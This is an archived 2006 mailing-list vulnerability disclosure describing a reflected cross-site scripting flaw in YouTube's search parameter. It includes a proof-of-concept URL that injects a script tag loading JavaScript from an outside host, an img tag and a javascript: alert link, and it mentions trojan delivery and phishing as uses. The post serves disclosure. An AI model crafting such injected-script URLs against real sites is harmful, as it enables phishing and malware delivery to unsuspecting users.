THere exist a lack of checking in the parametrs passed to the
search engine as a result it is possible to even change the contents
of the page. A successfull exploitation may not only allow to execute
js code for instance to download trojans, but it is also possible to
use as a phisher attack. Here is an example that illustrates the
threat:
http://www.youtube.com/results?search=gaki+no+tsuki%20%3Cimg%20src=%22http://www.danad.com.pl/pic/Zwierzeta/Kroliki/krolik%20002.jpg%22%3E%20%20%3Cscript%20src=%22http://michal.mooo.com/biuro/gora.js%22%20type=%22text/javascript%22%20language=%22JavaScript%22%3E%3C/script%3E%20%3Ca%20href=%22javascript:alert('exploited')%22%3EClick%20me%20to%20test%3C/a%3E&search_type=search_videos&search=Search
I would like to than my precious Magdalena Pogorzelska for her support.
Regards sectroyer(Micha³ Majchrowicz).
This archive was generated by hypermail 2.1.3 : Mon Jun 12 2006 - 20:55:35 PDT